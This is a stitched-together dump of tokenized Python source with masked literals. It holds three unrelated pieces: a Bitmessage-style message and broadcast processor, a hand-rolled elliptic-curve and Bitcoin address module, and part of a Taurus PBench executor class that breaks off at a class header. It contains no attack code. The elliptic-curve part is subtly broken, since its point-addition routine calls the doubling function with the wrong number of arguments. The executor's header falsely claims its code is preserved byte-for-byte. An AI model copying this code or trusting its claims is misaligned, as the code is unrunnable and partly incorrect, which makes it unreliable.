% sendersAddressVersionNumber ) <EOL> return <EOL> if len ( decryptedData ) < <NUM_LIT> : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> return <EOL> sendersStreamNumber , sendersStreamNumberLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> if sendersStreamNumber == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersStreamNumberLength <EOL> behaviorBitfield = decryptedData [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> pubSigningKey = '<STR_LIT>' + decryptedData [ <EOL> readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> pubEncryptionKey = '<STR_LIT>' + decryptedData [ <EOL> readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> if sendersAddressVersionNumber >= <NUM_LIT:3> : <EOL> requiredAverageProofOfWorkNonceTrialsPerByte , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . info ( '<STR_LIT>' % requiredAverageProofOfWorkNonceTrialsPerByte ) <EOL> requiredPayloadLengthExtraBytes , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . info ( '<STR_LIT>' % requiredPayloadLengthExtraBytes ) <EOL> endOfThePublicKeyPosition = readPosition <EOL> if toRipe != decryptedData [ readPosition : readPosition + <NUM_LIT:20> ] : <EOL> logger . info ( '<STR_LIT>' % ( toRipe . encode ( '<STR_LIT>' ) , decryptedData [ readPosition : readPosition + <NUM_LIT:20> ] . 
encode ( '<STR_LIT>' ) ) <EOL> ) <EOL> return <EOL> readPosition += <NUM_LIT:20> <EOL> messageEncodingType , messageEncodingTypeLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += messageEncodingTypeLength <EOL> messageLength , messageLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += messageLengthLength <EOL> message = decryptedData [ readPosition : readPosition + messageLength ] <EOL> readPosition += messageLength <EOL> ackLength , ackLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += ackLengthLength <EOL> ackData = decryptedData [ readPosition : readPosition + ackLength ] <EOL> readPosition += ackLength <EOL> positionOfBottomOfAckData = readPosition <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = decryptedData [ <EOL> readPosition : readPosition + signatureLength ] <EOL> signedData = data [ <NUM_LIT:8> : <NUM_LIT:20> ] + encodeVarint ( <NUM_LIT:1> ) + encodeVarint ( streamNumberAsClaimedByMsg ) + decryptedData [ : positionOfBottomOfAckData ] <EOL> if not highlevelcrypto . verify ( signedData , signature , pubSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' % <EOL> ( helper_bitcoin . calculateBitcoinAddressFromPubkey ( pubSigningKey ) , helper_bitcoin . calculateTestnetAddressFromPubkey ( pubSigningKey ) ) <EOL> ) <EOL> sigHash = hashlib . sha512 ( hashlib . sha512 ( signature ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( pubSigningKey + pubEncryptionKey ) <EOL> ripe = hashlib . new ( '<STR_LIT>' ) <EOL> ripe . update ( sha . 
digest ( ) ) <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersionNumber , sendersStreamNumber , ripe . digest ( ) ) <EOL> sqlExecute ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress , <EOL> sendersAddressVersionNumber , <EOL> decryptedData [ : endOfThePublicKeyPosition ] , <EOL> int ( time . time ( ) ) , <EOL> '<STR_LIT:yes>' ) <EOL> self . possibleNewPubkey ( fromAddress ) <EOL> if decodeAddress ( toAddress ) [ <NUM_LIT:1> ] >= <NUM_LIT:3> and not shared . safeConfigGetBoolean ( toAddress , '<STR_LIT>' ) : <EOL> if not shared . isAddressInMyAddressBookSubscriptionsListOrWhitelist ( fromAddress ) : <EOL> requiredNonceTrialsPerByte = shared . config . getint ( <EOL> toAddress , '<STR_LIT>' ) <EOL> requiredPayloadLengthExtraBytes = shared . config . getint ( <EOL> toAddress , '<STR_LIT>' ) <EOL> if not shared . isProofOfWorkSufficient ( data , requiredNonceTrialsPerByte , requiredPayloadLengthExtraBytes ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> blockMessage = False <EOL> if shared . config . get ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' : <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress ) <EOL> if queryreturn != [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> else : <EOL> queryreturn = sqlQuery ( <EOL> '''<STR_LIT>''' , <EOL> fromAddress ) <EOL> if queryreturn == [ ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> toLabel = shared . config . get ( toAddress , '<STR_LIT:label>' ) <EOL> if toLabel == '<STR_LIT>' : <EOL> toLabel = toAddress <EOL> if messageEncodingType == <NUM_LIT:2> : <EOL> subject , body = self . decodeType2Message ( message ) <EOL> logger . info ( '<STR_LIT>' % repr ( subject ) [ : <NUM_LIT:100> ] ) <EOL> elif messageEncodingType == <NUM_LIT:1> : <EOL> body = message <EOL> subject = '<STR_LIT>' <EOL> elif messageEncodingType == <NUM_LIT:0> : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> subject = '<STR_LIT>' <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = '<STR_LIT>' + repr ( message ) <EOL> subject = '<STR_LIT>' <EOL> if helper_inbox . isMessageAlreadyInInbox ( sigHash ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> blockMessage = True <EOL> if not blockMessage : <EOL> if messageEncodingType != <NUM_LIT:0> : <EOL> t = ( inventoryHash , toAddress , fromAddress , subject , int ( <EOL> time . time ( ) ) , body , '<STR_LIT>' , messageEncodingType , <NUM_LIT:0> , sigHash ) <EOL> helper_inbox . insert ( t ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> inventoryHash , toAddress , fromAddress , subject , body ) ) ) <EOL> if shared . safeConfigGetBoolean ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> apiNotifyPath = shared . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> apiNotifyPath = '<STR_LIT>' <EOL> if apiNotifyPath != '<STR_LIT>' : <EOL> call ( [ apiNotifyPath , "<STR_LIT>" ] ) <EOL> if shared . safeConfigGetBoolean ( toAddress , '<STR_LIT>' ) : <EOL> try : <EOL> mailingListName = shared . config . get ( <EOL> toAddress , '<STR_LIT>' ) <EOL> except : <EOL> mailingListName = '<STR_LIT>' <EOL> subject = self . addMailingListNameToSubject ( <EOL> subject , mailingListName ) <EOL> message = time . strftime ( "<STR_LIT>" , time . gmtime ( <EOL> ) ) + '<STR_LIT>' + fromAddress + '<STR_LIT>' + body <EOL> fromAddress = toAddress <EOL> ackdataForBroadcast = OpenSSL . rand ( <EOL> <NUM_LIT:32> ) <EOL> toAddress = '<STR_LIT>' <EOL> ripe = '<STR_LIT>' <EOL> TTL = <NUM_LIT:2> * <NUM_LIT:7> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> t = ( '<STR_LIT>' , <EOL> toAddress , <EOL> ripe , <EOL> fromAddress , <EOL> subject , <EOL> message , <EOL> ackdataForBroadcast , <EOL> int ( time . time ( ) ) , <EOL> int ( time . time ( ) ) , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' , <EOL> <NUM_LIT:2> , <EOL> TTL ) <EOL> helper_sent . insert ( t ) <EOL> shared . 
UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> toAddress , '<STR_LIT>' , fromAddress , subject , message , ackdataForBroadcast ) ) ) <EOL> shared . workerQueue . put ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . ackDataHasAVaildHeader ( ackData ) : <EOL> shared . checkAndShareObjectWithPeers ( ackData [ <NUM_LIT> : ] ) <EOL> timeRequiredToAttemptToDecryptMessage = time . time ( <EOL> ) - messageProcessingStartTime <EOL> shared . successfullyDecryptMessageTimings . append ( <EOL> timeRequiredToAttemptToDecryptMessage ) <EOL> sum = <NUM_LIT:0> <EOL> for item in shared . successfullyDecryptMessageTimings : <EOL> sum += item <EOL> logger . debug ( '<STR_LIT>' % <EOL> ( timeRequiredToAttemptToDecryptMessage , sum / len ( shared . successfullyDecryptMessageTimings ) ) <EOL> ) <EOL> def processbroadcast ( self , data ) : <EOL> messageProcessingStartTime = time . time ( ) <EOL> shared . numberOfBroadcastsProcessed += <NUM_LIT:1> <EOL> shared . UISignalQueue . put ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> inventoryHash = calculateInventoryHash ( data ) <EOL> readPosition = <NUM_LIT:20> <EOL> broadcastVersion , broadcastVersionLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += broadcastVersionLength <EOL> if broadcastVersion < <NUM_LIT:4> or broadcastVersion > <NUM_LIT:5> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> cleartextStreamNumber , cleartextStreamNumberLength = decodeVarint ( <EOL> data [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += cleartextStreamNumberLength <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> """<STR_LIT>""" <EOL> signedData = data [ <NUM_LIT:8> : readPosition ] <EOL> initialDecryptionSuccessful = False <EOL> for key , cryptorObject in shared . MyECSubscriptionCryptorObjects . items ( ) : <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> toRipe = key <EOL> initialDecryptionSuccessful = True <EOL> logger . 
info ( '<STR_LIT>' % key . encode ( '<STR_LIT>' ) ) <EOL> break <EOL> except Exception as err : <EOL> pass <EOL> if not initialDecryptionSuccessful : <EOL> logger . debug ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> embeddedTag = data [ readPosition : readPosition + <NUM_LIT:32> ] <EOL> readPosition += <NUM_LIT:32> <EOL> if embeddedTag not in shared . MyECSubscriptionCryptorObjects : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> signedData = data [ <NUM_LIT:8> : readPosition ] <EOL> cryptorObject = shared . MyECSubscriptionCryptorObjects [ embeddedTag ] <EOL> try : <EOL> decryptedData = cryptorObject . decrypt ( data [ readPosition : ] ) <EOL> logger . debug ( '<STR_LIT>' ) <EOL> except Exception as err : <EOL> logger . debug ( '<STR_LIT>' % broadcastVersion ) <EOL> return <EOL> readPosition = <NUM_LIT:0> <EOL> sendersAddressVersion , sendersAddressVersionLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> if sendersAddressVersion < <NUM_LIT:2> or sendersAddressVersion > <NUM_LIT:3> : <EOL> logger . warning ( '<STR_LIT>' ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> if sendersAddressVersion < <NUM_LIT:4> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersAddressVersionLength <EOL> sendersStream , sendersStreamLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if sendersStream != cleartextStreamNumber : <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> return <EOL> readPosition += sendersStreamLength <EOL> behaviorBitfield = decryptedData [ readPosition : readPosition + <NUM_LIT:4> ] <EOL> readPosition += <NUM_LIT:4> <EOL> sendersPubSigningKey = '<STR_LIT>' + decryptedData [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> sendersPubEncryptionKey = '<STR_LIT>' + decryptedData [ readPosition : readPosition + <NUM_LIT:64> ] <EOL> readPosition += <NUM_LIT:64> <EOL> if sendersAddressVersion >= <NUM_LIT:3> : <EOL> requiredAverageProofOfWorkNonceTrialsPerByte , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . debug ( '<STR_LIT>' % requiredAverageProofOfWorkNonceTrialsPerByte ) <EOL> requiredPayloadLengthExtraBytes , varintLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:10> ] ) <EOL> readPosition += varintLength <EOL> logger . debug ( '<STR_LIT>' % requiredPayloadLengthExtraBytes ) <EOL> endOfPubkeyPosition = readPosition <EOL> sha = hashlib . new ( '<STR_LIT>' ) <EOL> sha . update ( sendersPubSigningKey + sendersPubEncryptionKey ) <EOL> ripeHasher = hashlib . new ( '<STR_LIT>' ) <EOL> ripeHasher . update ( sha . digest ( ) ) <EOL> calculatedRipe = ripeHasher . digest ( ) <EOL> if broadcastVersion == <NUM_LIT:4> : <EOL> if toRipe != calculatedRipe : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> elif broadcastVersion == <NUM_LIT:5> : <EOL> calculatedTag = hashlib . sha512 ( hashlib . sha512 ( encodeVarint ( <EOL> sendersAddressVersion ) + encodeVarint ( sendersStream ) + calculatedRipe ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> if calculatedTag != embeddedTag : <EOL> logger . 
debug ( '<STR_LIT>' ) <EOL> return <EOL> messageEncodingType , messageEncodingTypeLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> if messageEncodingType == <NUM_LIT:0> : <EOL> return <EOL> readPosition += messageEncodingTypeLength <EOL> messageLength , messageLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += messageLengthLength <EOL> message = decryptedData [ readPosition : readPosition + messageLength ] <EOL> readPosition += messageLength <EOL> readPositionAtBottomOfMessage = readPosition <EOL> signatureLength , signatureLengthLength = decodeVarint ( <EOL> decryptedData [ readPosition : readPosition + <NUM_LIT:9> ] ) <EOL> readPosition += signatureLengthLength <EOL> signature = decryptedData [ <EOL> readPosition : readPosition + signatureLength ] <EOL> signedData += decryptedData [ : readPositionAtBottomOfMessage ] <EOL> if not highlevelcrypto . verify ( signedData , signature , sendersPubSigningKey . encode ( '<STR_LIT>' ) ) : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' ) <EOL> sigHash = hashlib . sha512 ( hashlib . sha512 ( signature ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersion , sendersStream , calculatedRipe ) <EOL> logger . info ( '<STR_LIT>' % fromAddress ) <EOL> sqlExecute ( '''<STR_LIT>''' , <EOL> fromAddress , <EOL> sendersAddressVersion , <EOL> decryptedData [ : endOfPubkeyPosition ] , <EOL> int ( time . time ( ) ) , <EOL> '<STR_LIT:yes>' ) <EOL> self . possibleNewPubkey ( fromAddress ) <EOL> fromAddress = encodeAddress ( <EOL> sendersAddressVersion , sendersStream , calculatedRipe ) <EOL> with shared . printLock : <EOL> print '<STR_LIT>' , fromAddress <EOL> if messageEncodingType == <NUM_LIT:2> : <EOL> subject , body = self . decodeType2Message ( message ) <EOL> logger . 
info ( '<STR_LIT>' % repr ( subject ) [ : <NUM_LIT:100> ] ) <EOL> elif messageEncodingType == <NUM_LIT:1> : <EOL> body = message <EOL> subject = '<STR_LIT>' <EOL> elif messageEncodingType == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> else : <EOL> body = '<STR_LIT>' + repr ( message ) <EOL> subject = '<STR_LIT>' <EOL> toAddress = '<STR_LIT>' <EOL> if helper_inbox . isMessageAlreadyInInbox ( sigHash ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return <EOL> t = ( inventoryHash , toAddress , fromAddress , subject , int ( <EOL> time . time ( ) ) , body , '<STR_LIT>' , messageEncodingType , <NUM_LIT:0> , sigHash ) <EOL> helper_inbox . insert ( t ) <EOL> shared . UISignalQueue . put ( ( '<STR_LIT>' , ( <EOL> inventoryHash , toAddress , fromAddress , subject , body ) ) ) <EOL> if shared . safeConfigGetBoolean ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> try : <EOL> apiNotifyPath = shared . config . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> except : <EOL> apiNotifyPath = '<STR_LIT>' <EOL> if apiNotifyPath != '<STR_LIT>' : <EOL> call ( [ apiNotifyPath , "<STR_LIT>" ] ) <EOL> logger . info ( '<STR_LIT>' % ( time . time ( ) - messageProcessingStartTime , ) ) <EOL> def possibleNewPubkey ( self , address ) : <EOL> """<STR_LIT>""" <EOL> status , addressVersion , streamNumber , ripe = decodeAddress ( address ) <EOL> if addressVersion <= <NUM_LIT:3> : <EOL> if address in shared . neededPubkeys : <EOL> del shared . neededPubkeys [ address ] <EOL> self . sendMessages ( address ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' % address ) <EOL> elif addressVersion >= <NUM_LIT:4> : <EOL> tag = hashlib . sha512 ( hashlib . sha512 ( encodeVarint ( <EOL> addressVersion ) + encodeVarint ( streamNumber ) + ripe ) . digest ( ) ) . digest ( ) [ <NUM_LIT:32> : ] <EOL> if tag in shared . neededPubkeys : <EOL> del shared . neededPubkeys [ tag ] <EOL> self . sendMessages ( address ) <EOL> def sendMessages ( self , address ) : <EOL> """<STR_LIT>""" <EOL> logger . 
info ( '<STR_LIT>' ) <EOL> sqlExecute ( <EOL> '''<STR_LIT>''' , <EOL> address ) <EOL> shared . workerQueue . put ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def ackDataHasAVaildHeader ( self , ackData ) : <EOL> if len ( ackData ) < shared . Header . size : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> magic , command , payloadLength , checksum = shared . Header . unpack ( ackData [ : shared . Header . size ] ) <EOL> if magic != <NUM_LIT> : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> payload = ackData [ shared . Header . size : ] <EOL> if len ( payload ) != payloadLength : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> if payloadLength > <NUM_LIT> : <EOL> """<STR_LIT>""" <EOL> return False <EOL> if checksum != hashlib . sha512 ( payload ) . digest ( ) [ <NUM_LIT:0> : <NUM_LIT:4> ] : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return False <EOL> command = command . rstrip ( '<STR_LIT:\x00>' ) <EOL> if command != '<STR_LIT:object>' : <EOL> return False <EOL> return True <EOL> def addMailingListNameToSubject ( self , subject , mailingListName ) : <EOL> subject = subject . strip ( ) <EOL> if subject [ : <NUM_LIT:3> ] == '<STR_LIT>' or subject [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> subject = subject [ <NUM_LIT:3> : ] . strip ( ) <EOL> if '<STR_LIT:[>' + mailingListName + '<STR_LIT:]>' in subject : <EOL> return subject <EOL> else : <EOL> return '<STR_LIT:[>' + mailingListName + '<STR_LIT>' + subject <EOL> def decodeType2Message ( self , message ) : <EOL> bodyPositionIndex = string . find ( message , '<STR_LIT>' ) <EOL> if bodyPositionIndex > <NUM_LIT:1> : <EOL> subject = message [ <NUM_LIT:8> : bodyPositionIndex ] <EOL> subject = subject [ : <NUM_LIT> ] <EOL> body = message [ bodyPositionIndex + <NUM_LIT:6> : ] <EOL> else : <EOL> subject = '<STR_LIT>' <EOL> body = message <EOL> if subject : <EOL> subject = subject . splitlines ( ) [ <NUM_LIT:0> ] <EOL> return subject , body </s>
<s> import hashlib , re <EOL> P = <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:2> ** <NUM_LIT:9> - <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:2> ** <NUM_LIT:7> - <NUM_LIT:2> ** <NUM_LIT:6> - <NUM_LIT:2> ** <NUM_LIT:4> - <NUM_LIT:1> <EOL> A = <NUM_LIT:0> <EOL> Gx = <NUM_LIT> <EOL> Gy = <NUM_LIT> <EOL> G = ( Gx , Gy ) <EOL> def inv ( a , n ) : <EOL> lm , hm = <NUM_LIT:1> , <NUM_LIT:0> <EOL> low , high = a % n , n <EOL> while low > <NUM_LIT:1> : <EOL> r = high / low <EOL> nm , new = hm - lm * r , high - low * r <EOL> lm , low , hm , high = nm , new , lm , low <EOL> return lm % n <EOL> def get_code_string ( base ) : <EOL> if base == <NUM_LIT:2> : return '<STR_LIT>' <EOL> elif base == <NUM_LIT:10> : return '<STR_LIT>' <EOL> elif base == <NUM_LIT:16> : return "<STR_LIT>" <EOL> elif base == <NUM_LIT> : return "<STR_LIT>" <EOL> elif base == <NUM_LIT> : return '<STR_LIT>' . join ( [ chr ( x ) for x in range ( <NUM_LIT> ) ] ) <EOL> else : raise ValueError ( "<STR_LIT>" ) <EOL> def encode ( val , base , minlen = <NUM_LIT:0> ) : <EOL> code_string = get_code_string ( base ) <EOL> result = "<STR_LIT>" <EOL> while val > <NUM_LIT:0> : <EOL> result = code_string [ val % base ] + result <EOL> val /= base <EOL> if len ( result ) < minlen : <EOL> result = code_string [ <NUM_LIT:0> ] * ( minlen - len ( result ) ) + result <EOL> return result <EOL> def decode ( string , base ) : <EOL> code_string = get_code_string ( base ) <EOL> result = <NUM_LIT:0> <EOL> if base == <NUM_LIT:16> : string = string . lower ( ) <EOL> while len ( string ) > <NUM_LIT:0> : <EOL> result *= base <EOL> result += code_string . 
find ( string [ <NUM_LIT:0> ] ) <EOL> string = string [ <NUM_LIT:1> : ] <EOL> return result <EOL> def changebase ( string , frm , to , minlen = <NUM_LIT:0> ) : <EOL> return encode ( decode ( string , frm ) , to , minlen ) <EOL> def base10_add ( a , b ) : <EOL> if a == None : return b [ <NUM_LIT:0> ] , b [ <NUM_LIT:1> ] <EOL> if b == None : return a [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] <EOL> if a [ <NUM_LIT:0> ] == b [ <NUM_LIT:0> ] : <EOL> if a [ <NUM_LIT:1> ] == b [ <NUM_LIT:1> ] : return base10_double ( a [ <NUM_LIT:0> ] , a [ <NUM_LIT:1> ] ) <EOL> else : return None <EOL> m = ( ( b [ <NUM_LIT:1> ] - a [ <NUM_LIT:1> ] ) * inv ( b [ <NUM_LIT:0> ] - a [ <NUM_LIT:0> ] , P ) ) % P <EOL> x = ( m * m - a [ <NUM_LIT:0> ] - b [ <NUM_LIT:0> ] ) % P <EOL> y = ( m * ( a [ <NUM_LIT:0> ] - x ) - a [ <NUM_LIT:1> ] ) % P <EOL> return ( x , y ) <EOL> def base10_double ( a ) : <EOL> if a == None : return None <EOL> m = ( ( <NUM_LIT:3> * a [ <NUM_LIT:0> ] * a [ <NUM_LIT:0> ] + A ) * inv ( <NUM_LIT:2> * a [ <NUM_LIT:1> ] , P ) ) % P <EOL> x = ( m * m - <NUM_LIT:2> * a [ <NUM_LIT:0> ] ) % P <EOL> y = ( m * ( a [ <NUM_LIT:0> ] - x ) - a [ <NUM_LIT:1> ] ) % P <EOL> return ( x , y ) <EOL> def base10_multiply ( a , n ) : <EOL> if n == <NUM_LIT:0> : return G <EOL> if n == <NUM_LIT:1> : return a <EOL> if ( n % <NUM_LIT:2> ) == <NUM_LIT:0> : return base10_double ( base10_multiply ( a , n / <NUM_LIT:2> ) ) <EOL> if ( n % <NUM_LIT:2> ) == <NUM_LIT:1> : return base10_add ( base10_double ( base10_multiply ( a , n / <NUM_LIT:2> ) ) , a ) <EOL> def hex_to_point ( h ) : return ( decode ( h [ <NUM_LIT:2> : <NUM_LIT> ] , <NUM_LIT:16> ) , decode ( h [ <NUM_LIT> : ] , <NUM_LIT:16> ) ) <EOL> def point_to_hex ( p ) : return '<STR_LIT>' + encode ( p [ <NUM_LIT:0> ] , <NUM_LIT:16> , <NUM_LIT:64> ) + encode ( p [ <NUM_LIT:1> ] , <NUM_LIT:16> , <NUM_LIT:64> ) <EOL> def multiply ( privkey , pubkey ) : <EOL> return point_to_hex ( base10_multiply ( hex_to_point ( pubkey ) , decode ( privkey , <NUM_LIT:16> ) ) 
) <EOL> def privtopub ( privkey ) : <EOL> return point_to_hex ( base10_multiply ( G , decode ( privkey , <NUM_LIT:16> ) ) ) <EOL> def add ( p1 , p2 ) : <EOL> if ( len ( p1 ) == <NUM_LIT:32> ) : <EOL> return encode ( decode ( p1 , <NUM_LIT:16> ) + decode ( p2 , <NUM_LIT:16> ) % P , <NUM_LIT:16> , <NUM_LIT:32> ) <EOL> else : <EOL> return point_to_hex ( base10_add ( hex_to_point ( p1 ) , hex_to_point ( p2 ) ) ) <EOL> def hash_160 ( string ) : <EOL> intermed = hashlib . sha256 ( string ) . digest ( ) <EOL> ripemd160 = hashlib . new ( '<STR_LIT>' ) <EOL> ripemd160 . update ( intermed ) <EOL> return ripemd160 . digest ( ) <EOL> def dbl_sha256 ( string ) : <EOL> return hashlib . sha256 ( hashlib . sha256 ( string ) . digest ( ) ) . digest ( ) <EOL> def bin_to_b58check ( inp ) : <EOL> inp_fmtd = '<STR_LIT:\x00>' + inp <EOL> leadingzbytes = len ( re . match ( '<STR_LIT>' , inp_fmtd ) . group ( <NUM_LIT:0> ) ) <EOL> checksum = dbl_sha256 ( inp_fmtd ) [ : <NUM_LIT:4> ] <EOL> return '<STR_LIT:1>' * leadingzbytes + changebase ( inp_fmtd + checksum , <NUM_LIT> , <NUM_LIT> ) <EOL> def pubkey_to_address ( pubkey ) : <EOL> return bin_to_b58check ( hash_160 ( changebase ( pubkey , <NUM_LIT:16> , <NUM_LIT> ) ) ) </s>
# ---------------------------------------------------------------------------
# bzt PBench executor module.  All string/number literals below are masked
# extraction placeholders (`<STR_LIT>`, `<NUM_LIT>`); structure and logic are
# preserved byte-for-byte from the original.
# ---------------------------------------------------------------------------
import csv
import datetime
import json
import math
import os
import socket
import string
import struct
import subprocess
import sys
import time
import traceback
from abc import abstractmethod
from os import strerror
from subprocess import CalledProcessError

import psutil

from bzt import resources
from bzt.engine import ScenarioExecutor, FileLister, Scenario
from bzt.modules.aggregator import ResultsReader, DataPoint, KPISet, ConsolidatingAggregator
from bzt.modules.console import WidgetProvider, SidebarWidget
from bzt.six import string_types, urlencode, iteritems, parse, StringIO, b, viewvalues
from bzt.utils import shell_exec, shutdown_process, BetterDict, dehumanize_time, RequiredTool, IncrementableProgressBar


class PBenchExecutor(ScenarioExecutor, WidgetProvider, FileLister):
    """Taurus executor that drives the phantom/pbench load-generator tool.

    Lifecycle: prepare() builds payload/schedule/config files, startup()
    launches the tool, check() polls it, shutdown() kills it and validates
    that KPI output was produced.
    """

    def __init__(self):
        super(PBenchExecutor, self).__init__()
        self.pbench = None      # PBenchTool instance, set in _prepare_pbench
        self.widget = None      # console sidebar widget, lazily created
        self.start_time = None  # wall-clock start, set in startup()

    def prepare(self):
        self._prepare_pbench()
        reader = self.pbench.get_results_reader()
        if isinstance(self.engine.aggregator, ConsolidatingAggregator):
            self.engine.aggregator.add_underling(reader)

    def _prepare_pbench(self):
        # pick the enhanced (Taurus) or stock tool wrapper based on settings
        if self.settings.get('<STR_LIT>', False):
            self.log.info("<STR_LIT>")
            self.pbench = TaurusPBenchTool(self, self.log)
        else:
            self.log.info("<STR_LIT>")
            self.pbench = OriginalPBenchTool(self, self.log)
        tool = PBench(self.log, self.pbench.path)
        if not tool.check_if_installed():
            self.log.info("<STR_LIT>", tool.tool_name)
            tool.install()
        # order matters: payload first (schedule reads it), then config
        self.pbench.generate_payload(self.get_scenario())
        self.pbench.generate_schedule(self.get_load())
        self.pbench.generate_config(self.get_scenario(), self.get_load(), self.get_hostaliases())
        self.pbench.check_config()

    def startup(self):
        self.start_time = time.time()
        self.pbench.start(self.pbench.config_file)

    def check(self):
        # returns True when the tool finished successfully; raises on failure
        if self.widget:
            self.widget.update()
        retcode = self.pbench.process.poll()
        if retcode is not None:
            if retcode != <NUM_LIT:0>:
                self.log.info("<STR_LIT>", retcode)
                raise RuntimeError("<STR_LIT>")
            return True
        return False

    def get_widget(self):
        """Return (lazily creating) the sidebar widget for console UI."""
        if not self.widget:
            proto = "<STR_LIT>" if self.pbench.use_ssl else '<STR_LIT:http>'
            label = "<STR_LIT>" % (proto, self.pbench.hostname, self.pbench.port)
            self.widget = SidebarWidget(self, label)
        return self.widget

    def shutdown(self):
        shutdown_process(self.pbench.process, self.log)
        # NOTE(review): RuntimeError called with two args (message + path),
        # not %-formatted — kept as in the original.
        if not os.path.exists(self.pbench.kpi_file) or os.path.getsize(self.pbench.kpi_file) == <NUM_LIT:0>:
            raise RuntimeError("<STR_LIT>", self.pbench.kpi_file)

    def resource_files(self):
        # only the scenario script (if any) needs to travel with the config
        resource_files = []
        scenario = self.get_scenario()
        script = scenario.get(Scenario.SCRIPT, None)
        if script:
            resource_files.append(os.path.basename(script))
        return resource_files


class PBenchTool(object):
